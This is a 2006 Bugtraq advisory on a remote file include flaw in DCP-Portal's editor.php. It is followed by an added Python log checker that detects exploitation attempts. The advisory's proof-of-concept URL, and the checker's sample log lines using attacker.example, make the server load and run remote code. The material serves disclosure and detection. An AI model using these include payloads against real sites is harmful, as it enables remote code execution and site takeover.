Open Source and information security mailing list archives
 
Message-ID: <20060613083035.32688.qmail@securityfocus.com>
Date: 13 Jun 2006 08:30:35 -0000
From: botan@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: [Kurdish Security # 8] DCP-Portal Remote File Include
 Vulnerability [Editor DHTML]


# Kurdish Security Advisory
# irc.gigachat.net #kurdhack 
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz 

$url_path_editor = "$root_url/library/editor/"; 
$abs_path_editor = "$root/library/editor/"; 

?>

Proof Of Concept 

http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id
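Added example, not part of the original advisory: a log check that flags requests matching the pattern above, where the `root` parameter of `editor.php` carries a remote URL. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Remote wrappers that a PHP include can fetch when URL includes are enabled.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Script path from the advisory; the install prefix ([dcpath]) varies per site.
EDITOR_PATH = "/library/editor/editor.php"

def remote_include_params(log_line):
    """Return [(param, value)] for .php query parameters holding a remote URL."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith(".php"):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if REMOTE_SCHEME.match(value) or REMOTE_SCHEME.match(unquote(value)):
            hits.append((name, value))
    return hits

def is_advisory_pattern(log_line):
    """True for the advisory's request shape: editor.php with a remote 'root'."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    path = urlsplit(m.group(1)).path.lower()
    hits = remote_include_params(log_line)
    return path.endswith(EDITOR_PATH) and any(n == "root" for n, _ in hits)

# Constructed sample log lines (documentation addresses and .example hosts).
_P = '192.0.2.10 - - [13/Jun/2006:08:31:02 +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE = [
    _P % "/dcp/library/editor/editor.php?root=http://attacker.example/x.txt?cmd=id",
    _P % "/dcp/library/editor/editor.php?root=http%3A%2F%2Fattacker.example%2Fx.txt",
    _P % "/dcp/library/editor/editor.php?root=http%253A%252F%252Fattacker.example%252Fx",
    _P % "/dcp/library/editor/editor.php?lang=en",
    _P % "/dcp/login.php?return=https://www.example.org/home",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(is_advisory_pattern(line), remote_include_params(line))
```

`remote_include_params` is deliberately broader than the advisory and will also flag legitimate redirect-style parameters such as the last sample line, so treat its hits as leads and `is_advisory_pattern` as the specific match.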

